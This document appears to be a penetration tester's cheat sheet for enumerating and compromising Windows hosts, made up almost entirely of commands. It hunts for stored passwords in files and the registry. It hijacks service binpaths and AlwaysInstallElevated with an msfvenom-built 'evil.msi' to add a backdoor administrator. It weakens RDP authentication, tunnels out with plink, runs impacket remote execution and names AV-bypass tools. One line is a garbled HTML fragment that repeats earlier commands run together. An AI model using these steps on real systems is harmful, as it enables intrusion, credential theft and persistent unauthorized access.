Manual Windows Enumeration

Basic Host Information (Kernel Exploits etc. etc.)

ver
systeminfo
systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
tasklist /v
c:\windows\system32\license.rtf
c:\windows\system32\eula.txt
wmic os get Caption, CSDVersion /value

Find user information

whoami
echo %username%
net user
net user (username)
echo %userprofile%
net localgroup
net config Workstation | find "User name"
query user
wmic useraccount get name
wmic /node: "127.0.0.1" computersystem get username
qwinsta
cmdkey /list

Learn about your ENV and what you have access to

SET
net

Check Domains and Domain Info

net view /domain
net view /domain:THINC
net localgroup “Administrators”
net group "Domain Admins" /domain 
net share 
net session | find / "\\"

What’s going on with the network could benefit you now or later

ipconfig /all
route print
arp -A
netstat -ano

Perform User Enumeration

whoami
echo %username%
net user
net user (username)
echo %userprofile%
net localgroup
net config Workstation | find "User name"
query user
wmic useraccount get name
wmic /node: "127.0.0.1" computersystem get username
qwinsta
reg.exe query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\WinLogon" /v DefaultUserName
reg.exe query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\WinLogon" /v DefaultPassword

Perform low level Password Enumeration

cmdkey /list
Simple File Search: 
dir /s *password*  
findstr /s /n /i /p password *  
findstr /si password *.txt
dir /s *secret*  
findstr /s /n /i /p secret *  
findstr /si secret *.txt

Check installed programs, permissions, and hidden files:

dir /q
dir /r
attrib -h *.*
wmic /node: "127.0.0.1" product get name, version
wmic product get /format:list

Check Cron Jobs

schtasks /query
schtasks /query /v /fo LIST
Get-ScheduledTask | Where State -EQ 'Ready'

Check for Patch Levels

systeminfo 

wmic qfe get Caption,Description,HotFixID,InstalledOn

Notes
Look for privilege escalation exploits and look up their respective KB patch numbers. Such exploits include, but are not limited to, KiTrap0D (KB979682), MS11-011 (KB2393802), MS10-059 (KB982799), MS10-021 (KB979683), MS11- 080 (KB2592799)
After enumerating the OS version and Service Pack you should find out which privilege escalation vulnerabilities could be present. Using the KB patch numbers you can grep the installed patches to see if any are missing
Search patches for given patch
wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB.." /C:"KB.."

Find writable files (Use with Cron,Scheduled tasks, Program Files running under ADmin)

dir /a-r-d /s /b

Notes

/a is to search for attributes. In this case r is read only and d is directory. The minus signs negate those attributes. So we're looking for writable files only.

/s means recurse subdirectories
/b means bare format. Path and filename only.

Check Permissions of Program Files / x86 executables  / Cron Executables

icacls.exe

Notes

Use writable executable to elevate permissions by creating backdoor or reverse shell 

Trusted Service Paths (Unquoted Service path, execute local program first.. look for services paths executing as priv user..)

List all unquoted service paths (minus built-in Windows services) on our compromised machine:

wmic service get name,displayname,pathname,startmode |findstr /i "Auto" |findstr /i /v "C:\Windows\\" |findstr /i /v """

Suppose we found:

C:\Program Files (x86)\Program Folder\A Subfolder\Executable.exe

If you look at the registry entry for this service with Regedit you can see the ImagePath value is:

C:\Program Files (x86)\Program Folder\A Subfolder\Executable.exe

To be secure it should be like this:
 “C:\Program Files (x86)\Program Folder\A Subfolder\Executable.exe”
When Windows attempts to run this service, it will look at the following paths in order and will run the first EXE that it will find:
   C:\Program.exe
   C:\Program Files.exe
   C:\Program Files(x86)\Program Folder\A.exe
       …
Check permissions of folder path
   icacls "C:\Program Files (x86)\Program Folder"

If we can write in the path we plant a backdoor with the same name with the service and restart the service.

Metasploit module:

exploit/windows/local/trusted_service_path

Check for Vulnerable Services

https://web.archive.org/web/20080530012252/http://live.sysinternals.com/accesschk.exe

accesschk.exe -uwcqv "Authenticated Users" * /accepteula
accesschk.exe -qdws "Authenticated Users" C:\Windows\ /accepteula
accesschk.exe -qdws Users C:\Windows\
Then query the service using Windows sc: 
sc qc <vulnerable service name>

Then change the binpath to execute your own commands (restart of the service will most likely be needed): 

sc config <vuln-service> binpath= "net user backdoor backdoor123 /add" 
sc stop <vuln-service>
sc start <vuln-service>
sc config <vuln-service> binpath= "net localgroup Administrators backdoor /add" 
sc stop <vuln-service>
sc start <vuln-service>
Note - Might need to use the depend attribute explicitly: 
sc stop <vuln-service>
sc config <vuln-service> binPath= "c:\inetpub\wwwroot\runmsf.exe" depend= "" start= demand obj= ".\LocalSystem" password= ""
sc start <vuln-service>


Metasploit module: 
exploit/windows/local/service_permissions
<a href="https://web.archive.org/web/20080530012252/http://live.sysinternals.com/accesschk.exeaccesschk.exe -uwcqv "Authenticated Users" * /accepteulaaccesschk.exe -qdws "Authenticated Users" C:\Windows\ /accepteulaaccesschk.exe -qdws Users C:\Windows\Then query the service using Windows sc: sc qc <vulnerable service name>Then change the binpath to execute your own commands (restart of the service will most likely be needed): sc config <vuln-service> binpath= "net user backdoor backdoor123 /add" sc stop <vuln-service>sc start <vuln-service>sc config <vuln-service> binpath= "net localgroup Administrators backdoor /add" sc stop <vuln-service>sc start <vuln-service>Note - Might need to use the depend attribute explicitly: sc stop <vuln-service>sc config <vuln-service> binPath= "c:\inetpub\wwwroot\runmsf.exe" depend= "" start= demand obj= ".\LocalSystem" password= ""sc start 

OTHER

Search for common files with default/cleatext creds

• dir /b /s unattend.xml
• dir /b /s web.config
• dir /b /s sysprep.inf

Grep the registry for keywords (e.g. “passwords”)

• reg query HKLM /f password /t REG_SZ /s
• reg query HKCU /f password /t REG_SZ /s
•  reg query “HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon”
• reg query “HKLM\SYSTEM\Current\ControlSet\Services\SNMP”
• reg query “HKCU\Software\SimonTatham\PuTTY\Sessions”
• reg query HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4 /v password

AlwaysInstallElevated

• AlwaysInstallElevated is a setting that allows non-privileged users the ability to run Microsoft Windows Installer Package Files (MSI) with elevated (SYSTEM) permissions. Check if these 2 registry values are set to “1”:
  • reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
  • reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
• If they are, create your own malicious msi:
  • msfvenom -p windows/adduser USER=backdoor PASS=backdoor123 -f msi -o evil.msi
• Then use msiexec on victim to execute your msi:
  • msiexec /quiet /qn /i C:\evil.msi
• Metasploit module:
  • exploit/windows/local/always_install_elevated

Post Exploit / Backdoor Commands 

• Add Users
  • net user username password /add
  • net localgroup Administrators username /add
  • net localgroup “Remote Desktop Users” username /add
• psexec.exe -accepteula \\10.11.10.167 -u hostname\username -p password cmd /c ipconfig 
• RunAs
  • runas /user:hostname\<username> explorer.exe
• Disable Firewall 
  • netsh firewall show state
  • netsh firewall show config
  • netsh advfirewall firewall show rule all
• RDP
  • Enable RDP
    • reg add “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server” /v fDenyTSConnections /t REG_DWORD /d 0 /f
  • Old RDP ker cred login bullshit
    • reg add “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp” /v UserAuthentication /t REG_DWORD /d 0 /f
  • Local Remote port forward Plink (Use to tunnel out RDP, SMB, etc. etc.)
    • plink.exe -l <user> -pw <password> 10.11.0.70 -R 9595:localhost:445
• Post Exploit Command and Control Examples (Avoid malware etc etc. )
  • dcomexec.py username:password@10.11.10.167 dir
  • psexec.py username:password@10.11.10.167 net user
  • ./smbexec.py username:password@192.168.1.103
• ByPass AV
  • veil-evasion
  • crypters
    • hyperion.exe

Exploit Suggesters / Priv Esc Helpers

• /var/www/tmp/linux-exploit-suggester.sh
• /var/www/tmp/windows-privesc-check2.exe
• /usr/bin/unix-privesc-check
• windows-exploit-suggester.py 
• https://github.com/breenmachine/RottenPotatoNG
• https://www.blackhillsinfosec.com/a-toast-to-kerberoast/
• https://www.kali.org/penetration-testing/passing-hash-remote-desktop/